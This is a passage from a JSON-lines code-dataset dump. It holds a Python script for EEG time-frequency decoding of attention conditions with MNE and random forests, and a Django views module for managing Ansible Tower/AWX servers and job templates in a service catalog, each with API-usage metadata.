"line_number": 1124, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 1128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1128, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1132, "usage_type": "attribute"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 1143, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1145, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1152, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 1159, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1159, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1159, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1165, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1165, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1165, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1168, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1168, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1168, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 1177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1177, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1190, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 1192, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1192, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 1198, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 1198, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1198, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 1199, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1199, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 968, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 1221, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 1221, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 1221, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1221, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 1224, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 1224, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1224, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 1225, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 1225, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1225, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1227, "usage_type": "call"}, {"api_name": 
"Model.News.query", "line_number": 1227, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1227, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 1230, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1230, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 1233, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 1233, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1256, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1256, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1256, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1270, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1270, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1270, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1273, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1280, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1288, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1288, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 1292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1292, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1296, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1296, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1309, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 1315, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1315, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1315, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 1324, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1324, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1324, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1345, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1345, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1345, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 1348, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1348, "usage_type": "name"}, {"api_name": "Config.list_editnews_class", "line_number": 1351, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 1352, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1352, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 1205, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 1375, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 1375, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 1375, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1375, "usage_type": "name"}, {"api_name": 
"flask.request.method", "line_number": 1379, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1379, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1383, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1383, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1383, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1384, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1384, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1384, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1387, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1387, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1387, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1388, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1388, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1388, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 1396, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 1396, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1396, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1413, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1413, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1413, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1414, "usage_type": "name"}, {"api_name": "Model.News", "line_number": 1421, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1421, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1431, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1431, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1431, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1431, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1439, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1442, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1446, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1454, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1454, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1454, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 1458, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1458, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1458, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1462, "usage_type": "attribute"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 1468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1470, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1477, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1477, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1477, "usage_type": "attribute"}, {"api_name": 
"flask.redirect", "line_number": 1487, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 1489, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1489, "usage_type": "name"}, {"api_name": "Config.list_addnews_class", "line_number": 1491, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 1359, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1502, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 1505, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 1505, "usage_type": "name"}, {"api_name": "Model.User.query.filter_by", "line_number": 1511, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 1511, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 1511, "usage_type": "name"}, {"api_name": "Model.User.query.filter_by", "line_number": 1526, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 1526, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 1526, "usage_type": "name"}, {"api_name": "flask_login.login_user", "line_number": 1534, "usage_type": "call"}, {"api_name": "Model.Department.query.filter_by", "line_number": 1537, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 1537, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 1537, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1539, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1540, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1541, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1542, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1545, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1549, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1549, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1549, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1558, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 1566, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 1570, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1578, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 1580, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 1584, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1584, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 1575, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 1589, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 1589, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 1589, "usage_type": "name"}, {"api_name": "Model.User.query.filter_by", "line_number": 1594, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 1594, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 1594, "usage_type": "name"}]} +{"seq_id": "414433555", "text": "# Author: Nicolas Legrand (legrand@cyceron.fr)\n\n\nimport matplotlib.pyplot as plt\nimport mne\nimport numpy as np\nimport pandas as pd\nfrom mne.decoding import SlidingEstimator, cross_val_multiscore\nfrom mne.time_frequency import tfr_morlet\nfrom sklearn.ensemble import RandomForestClassifier\nfrom 
sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n\ntask = \"Attention\"\nroot = \"D:/EEG_wd/Machine_learning/\"\ndata_path = \"D:/ENGRAMME/GROUPE_2/EEG/\"\n\n# Subjects ID\nnames = [\n \"31NLI\",\n \"32CVI\",\n \"34LME\",\n \"35QSY\",\n \"36LSA\",\n \"37BMA\",\n \"38MAX\",\n \"39BDA\",\n \"40MMA\",\n \"41BAL\",\n \"42SPE\",\n \"44SMU\",\n \"45MJA\",\n \"46SQU\",\n \"47HMA\",\n \"50JOC\",\n \"52PFA\",\n \"53SMA\",\n \"55MNI\",\n \"56BCL\",\n \"57NCO\",\n \"58BAN\",\n \"59DIN\",\n \"60CAN\",\n]\n\nclassifier = RandomForestClassifier(\n class_weight=\"balanced\", n_estimators=50, random_state=42\n)\n\n\n# =============================================================================\n# %%\n# =============================================================================\ndef data_attention(subject: str, eeg: bool = True):\n\n # Load e-prime file\n eprime_df = data_path + subject + \"/\" + subject + \"_a.txt\"\n eprime = pd.read_csv(eprime_df, skiprows=1, sep=\"\\t\")\n eprime = eprime[\n [\n \"Cond1\",\n \"Cond2\",\n \"Cond3\",\n \"Cond4\",\n \"Image.OnsetTime\",\n \"Image.RESP\",\n \"Image.RT\",\n \"ImageCentre\",\n \"ImageFond\",\n \"ListImage.Cycle\",\n ]\n ]\n eprime[\"ListImage.Cycle\"] = eprime[\"ListImage.Cycle\"] - 1\n epochs = None\n\n if eeg:\n\n # Load epoch from autoreject\n in_epoch = root + \"Attention/5_autoreject/\" + subject + \"-epo.fif\"\n epochs = mne.read_epochs(in_epoch, preload=True) # Epochs\n epochs.pick_types(\n emg=False, eeg=True, stim=False, eog=False, misc=False, exclude=\"bads\"\n )\n\n # Droped epochs\n eprime = eprime[[not i for i in epochs.drop_log]]\n eprime.reset_index(inplace=True, drop=True)\n\n # Aberrant values\n epochs.drop((eprime[\"Image.RT\"] < 400) | (eprime[\"Image.RT\"] > 3000))\n eprime = eprime[~((eprime[\"Image.RT\"] < 400) | (eprime[\"Image.RT\"] > 3000))]\n eprime.reset_index(inplace=True, drop=True)\n\n return epochs, eprime\n\n\n# =========================================\n# %% Decoding cross-frequencies - Attention\n# =========================================\n\n\ndef attention_TF_decoding(\n subject: str, freqs: np.ndarray = np.arange(3, 30, 1), decim: int = 20\n):\n\n # Import behavioral and EEG data.\n attention, attention_df = data_attention(subject)\n\n n_cycles = freqs / 2\n attention_tfr = tfr_morlet(\n attention,\n freqs,\n n_jobs=6,\n n_cycles=n_cycles,\n decim=decim,\n return_itc=False,\n average=False,\n )\n attention_tfr.crop(-0.5, 1.5)\n attention_tfr.apply_baseline(mode=\"percent\", baseline=(None, 0))\n\n labels = attention_df.Cond1[attention_df.Cond1 != \"Think\"] == \"No-Think\"\n\n # Run a sliding decoder for each frequency band\n scores_total = []\n for this_freq in range(len(freqs)):\n\n data = attention_tfr._data[attention_df.Cond1 != \"Think\", :, this_freq, :]\n\n # Classifier\n clf = make_pipeline(\n StandardScaler(),\n RandomForestClassifier(\n class_weight=\"balanced\", n_estimators=50, random_state=42\n ),\n )\n\n time_decod = SlidingEstimator(clf, n_jobs=1, scoring=\"roc_auc\")\n\n scores = cross_val_multiscore(time_decod, data, labels, cv=8, n_jobs=8)\n\n scores_total.append(np.asarray(scores).mean(0))\n\n return np.asarray(scores_total)\n\n\n# %% Run Time-frequency decoding\nif __name__ == \"__main__\":\n\n total = []\n for subject in names:\n subject_score = attention_TF_decoding(subject)\n total.append(subject_score)\n np.save(\n root + \"Results/Attention_TF_decoding/\" + subject + \".npy\", subject_score\n )\n\n plt.rcParams[\"figure.figsize\"] = [10.0, 5.0]\n 
plt.title(\"Frequency decoding - \" + subject, fontweight=\"bold\")\n plt.imshow(\n subject_score,\n origin=\"lower\",\n aspect=\"auto\",\n vmin=0.35,\n vmax=0.65,\n cmap=plt.cm.get_cmap(\"RdBu_r\", 20),\n interpolation=\"hanning\",\n extent=[-0.5, 1.5, 3, 30],\n )\n plt.axvline(x=0, color=\"k\", linewidth=3)\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Frequencies\")\n plt.colorbar()\n plt.savefig(root + \"Results/Attention_TF_decoding/\" + subject + \".png\", dpi=300)\n plt.clf()\n plt.close()\n", "sub_path": "code/7_Attention_time_frequency_decoding.py", "file_name": "7_Attention_time_frequency_decoding.py", "file_ext": "py", "file_size_in_byte": 4747, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 58, "usage_type": "call"}, {"api_name": "mne.read_epochs", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "mne.time_frequency.tfr_morlet", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 133, "usage_type": "call"}, {"api_name": "mne.decoding.SlidingEstimator", "line_number": 138, "usage_type": "call"}, {"api_name": "mne.decoding.cross_val_multiscore", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 158, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 166, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 175, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}]} +{"seq_id": "618348140", "text": "from django.contrib.auth.decorators import permission_required\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nfrom django_celery_results.models import TaskResult\n\nfrom service_catalog import tasks\nfrom service_catalog.forms import TowerServerForm\nfrom service_catalog.models import TowerServer, JobTemplate, Operation, OperationType\nfrom service_catalog.serializers import TaskResultSerializer\n\n\n@permission_required('service_catalog.add_towerserver')\ndef add_tower(request):\n if request.method == 'POST':\n form = TowerServerForm(request.POST)\n if form.is_valid():\n new_tower = form.save()\n new_tower.sync()\n return redirect('service_catalog:list_tower')\n else:\n form = TowerServerForm()\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': 'Create a new server', 'url': \"\"}\n ]\n context = {'form': form, 'breadcrumbs': breadcrumbs, 'action': 'create'}\n return render(request, 'service_catalog/admin/tower/tower-create.html', context)\n\n\n@permission_required('service_catalog.change_towerserver')\ndef sync_tower(request, tower_id, job_template_id=None):\n if request.method == 'POST':\n task = tasks.sync_tower.delay(tower_id, job_template_id)\n task_result = TaskResult(task_id=task.task_id)\n task_result.save()\n return JsonResponse({\"task_id\": task_result.id}, status=202)\n\n\n@permission_required('service_catalog.view_taskresult')\ndef get_task_result(request, task_id):\n task_result = TaskResult.objects.get(id=task_id)\n serialized_task = TaskResultSerializer(task_result)\n return JsonResponse(serialized_task.data, status=202)\n\n\n@permission_required('service_catalog.delete_towerserver')\ndef delete_tower(request, tower_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n if request.method == \"POST\":\n tower_server.delete()\n return redirect('service_catalog:list_tower')\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"}\n ]\n context = {\n \"tower_server\": tower_server,\n 'breadcrumbs': breadcrumbs\n }\n return render(request, \"service_catalog/admin/tower/tower-delete.html\", context)\n\n\n@permission_required('service_catalog.delete_jobtemplate')\ndef delete_job_template(request, tower_id, job_template_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n job_template = get_object_or_404(JobTemplate, id=job_template_id)\n if request.method == 'POST':\n job_template.delete()\n return redirect('service_catalog:tower_job_templates_list', tower_id=tower_id)\n args = {\n \"tower_id\": tower_server.id,\n \"job_template_id\": job_template.id,\n }\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"},\n {'text': 'Job templates', 'url': reverse('service_catalog:tower_job_templates_list', args=[tower_id])},\n {'text': job_template.name, 'url': \"\"},\n {'text': 'Delete', 'url': \"\"}\n ]\n warning_service_disabled = ' - This service will be disabled'\n operations = Operation.objects.filter(job_template=job_template)\n 
context = {\n 'breadcrumbs': breadcrumbs,\n 'confirm_text': mark_safe(f\"Confirm deletion of {job_template.name}?\"),\n 'action_url': reverse('service_catalog:delete_job_template', kwargs=args),\n 'button_text': 'Delete',\n 'details': {'warning_sentence': 'Warning: some services/operations are still using this job template:',\n 'details_list': [\n f\"Service: \\\"{operation.service.name}\\\" / Operation: \\\"{operation.name}\\\"{warning_service_disabled if operation.type == OperationType.CREATE else ''}.\"\n for operation in operations]\n } if operations else None\n }\n return render(request, 'generics/confirm-delete-template.html', context=context)\n\n\n@permission_required('service_catalog.view_jobtemplate')\ndef job_template_details(request, tower_id, job_template_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n job_template = get_object_or_404(JobTemplate, id=job_template_id)\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"},\n {'text': 'Job templates', 'url': reverse('service_catalog:tower_job_templates_list', args=[tower_id])},\n {'text': job_template.name, 'url': \"\"},\n ]\n context = {\n \"job_template\": job_template,\n 'breadcrumbs': breadcrumbs\n }\n return render(request, \"service_catalog/admin/tower/job_templates/job-template-details.html\", context=context)\n\n@permission_required('service_catalog.view_jobtemplate')\ndef job_template_compliancy(request, tower_id, job_template_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n job_template = get_object_or_404(JobTemplate, id=job_template_id)\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"},\n {'text': 'Job templates', 'url': reverse('service_catalog:tower_job_templates_list', args=[tower_id])},\n {'text': job_template.name, 'url': \"\"},\n {'text': 'Compliancy', 'url': \"\"}\n ]\n context = {\n 'breadcrumbs': breadcrumbs,\n 'compliancy_details': job_template.get_compliancy_details(),\n }\n return render(request, \"service_catalog/admin/tower/job_templates/job-template-compliancy.html\", context)\n\n\n@permission_required('service_catalog.change_towerserver')\ndef update_tower(request, tower_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n form = TowerServerForm(request.POST or None, instance=tower_server)\n if form.is_valid():\n form.save()\n return redirect('service_catalog:list_tower')\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"}\n ]\n context = {'form': form, 'tower_server': tower_server, 'breadcrumbs': breadcrumbs, 'action': 'edit'}\n return render(request, 'service_catalog/admin/tower/tower-edit.html', context)\n", "sub_path": "service_catalog/views/admin/tower.py", "file_name": "tower.py", "file_ext": "py", "file_size_in_byte": 6496, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "service_catalog.forms.TowerServerForm", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 21, "usage_type": "call"}, {"api_name": "service_catalog.forms.TowerServerForm", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.decorators.permission_required", "line_number": 14, "usage_type": "call"}, {"api_name": "service_catalog.tasks.sync_tower.delay", "line_number": 35, "usage_type": "call"}, {"api_name": "service_catalog.tasks.sync_tower", "line_number": 35, "usage_type": "attribute"}, {"api_name": "service_catalog.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "django_celery_results.models.TaskResult", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 32, "usage_type": "call"}, {"api_name": "django_celery_results.models.TaskResult.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "django_celery_results.models.TaskResult.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django_celery_results.models.TaskResult", "line_number": 43, "usage_type": "name"}, {"api_name": "service_catalog.serializers.TaskResultSerializer", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 50, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 53, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 67, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 67, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "service_catalog.models.JobTemplate", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 77, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 79, "usage_type": "call"}, {"api_name": "service_catalog.models.Operation.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "service_catalog.models.Operation.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "service_catalog.models.Operation", "line_number": 84, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 87, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 88, "usage_type": "call"}, {"api_name": "service_catalog.models.OperationType.CREATE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "service_catalog.models.OperationType", "line_number": 92, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 96, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 101, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 101, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", 
